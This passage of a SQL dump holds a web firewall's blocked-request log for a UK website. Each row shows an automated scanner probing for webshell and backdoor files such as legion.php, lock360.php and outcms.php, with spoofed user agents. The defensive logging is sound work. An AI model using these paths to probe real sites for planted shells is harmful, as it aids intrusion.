User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12203,1674879576.246517,1674879576.136200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12204,1674879575.568591,1674879575.459000,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12205,1674879574.200616,1674879574.095400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/xindex.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12206,1674879572.829103,1674879572.719600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12207,1674879572.100057,1674879571.986400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12208,1674879571.378980,1674879571.262200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12209,1674879569.892191,1674879569.747500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12210,1674879569.116850,1674879568.973900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12211,1674879568.711425,1674879568.596100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12212,1674879567.453751,1674879567.341900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12213,1674879566.768392,1674879566.652100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12214,1674879566.019137,1674879565.906300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12215,1674879564.479068,1674879564.365800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/css.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Nzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12216,1674879561.042518,1674879560.929700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12217,1674879558.887813,1674879558.774700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12218,1674879558.190661,1674879558.083300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12219,1674879556.767663,1674879556.659300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12220,1674879552.806156,1674879552.678800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12221,1674879552.101231,1674879551.971400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/qindex.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3FpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12222,1674879551.417135,1674879551.304100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12223,1674879550.695852,1674879550.540400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/xmlrpcs.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3htbHJwY3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12224,1674879549.899771,1674879549.789100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/xmrlpc.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12225,1674879549.229101,1674879549.116200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/old-index.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sZC1pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12226,1674879548.562546,1674879548.449300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12227,1674879547.689477,1674879547.579500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/lock360.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xvY2szNjAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12228,1674879547.014372,1674879546.904100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12229,1674879542.915935,1674879542.790300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12230,1674879542.206836,1674879542.067100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12231,1674879541.517202,1674879541.381300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12232,1674879541.151884,1674879541.040000,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12233,1674879540.482436,1674879540.335500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12234,1674879539.939390,1674879539.804500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12235,1674879518.189846,1674879517.999100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12236,1674879506.060139,1674879505.932100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/user/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(12237,1674879502.365583,1674879502.046600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/network/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(12238,1674879498.351509,1674879498.217100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/meta/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(12239,1674879473.894062,1674879473.781600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/uploads/images/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12240,1674879472.263319,1674879472.153200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/components/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12241,1674879469.134323,1674879469.019500,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12242,1674879465.410969,1674879465.293600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12243,1674879461.704330,1674879461.591200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12244,1674879459.176661,1674879459.049800,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/images/slider/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(12245,1674879456.531205,1674879456.419600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/include/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(12246,1674879453.935867,1674879453.825700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/editor/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 